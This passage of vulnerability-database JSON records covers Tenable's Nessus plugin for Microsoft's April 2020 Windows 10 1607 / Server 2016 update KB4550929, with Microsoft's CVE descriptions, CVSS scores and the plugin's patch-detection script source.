such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. 
The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-master\n font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. 
(CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1000)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. 
(CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. 
", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-05T14:16:46", "description": "
(CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-0940, CVE-2020-1006, CVE-2020-1017)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1000, CVE-2020-1003)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0937, CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. 
(CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. 
(CVE-2020-1094)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0985)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could overwrite files in arbitrary locations with elevated permissions. (CVE-2020-0942)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. 
(CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the Windows Delivery Optimization service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0784)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. 
An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the Windows System Assessment Tool improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows System Assessment Tool handles file operations. (CVE-2020-1011) \n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-0969)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550929: Windows 10 Version 1607 and Windows Server 2016 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0784", "CVE-2020-0821", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0940", "CVE-2020-0942", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1006", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", 
"CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1017", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550929.NASL", "href": "https://www.tenable.com/plugins/nessus/135468", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135468);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0784\",\n \"CVE-2020-0821\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0936\",\n \"CVE-2020-0937\",\n \"CVE-2020-0938\",\n \"CVE-2020-0940\",\n \"CVE-2020-0942\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0948\",\n \"CVE-2020-0949\",\n \"CVE-2020-0950\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0969\",\n \"CVE-2020-0982\",\n \"CVE-2020-0983\",\n \"CVE-2020-0985\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1003\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1006\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1011\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1017\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"IAVA\", 
value:\"2020-A-0156-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4550929\");\n script_xref(name:\"MSFT\", value:\"MS20-4550929\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550929: Windows 10 Version 1607 and Windows Server 2016 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550929.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. 
(CVE-2020-0948,\n CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Push Notification Service handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-0940,\n CVE-2020-1006, CVE-2020-1017)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. 
(CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1000, CVE-2020-1003)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0937,\n CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. 
(CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Stack fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0985)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. 
An attacker who\n successfully exploited this vulnerability could\n overwrite files in arbitrary locations with elevated\n permissions. (CVE-2020-0942)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the\n Windows Delivery Optimization service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code\n with elevated system privileges. 
An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0784)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. 
An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the\n Windows System Assessment Tool improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows System Assessment Tool\n handles file operations. (CVE-2020-1011)\n \n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. 
The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-0969)\");\n # https://support.microsoft.com/en-us/help/4550929/windows-10-update-kb4550929\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?24b003af\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4550929.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550929');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550929])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-06T14:16:26", "description": "The remote Windows host is missing security update 4550927.\nIt is, therefore, affected by multiple 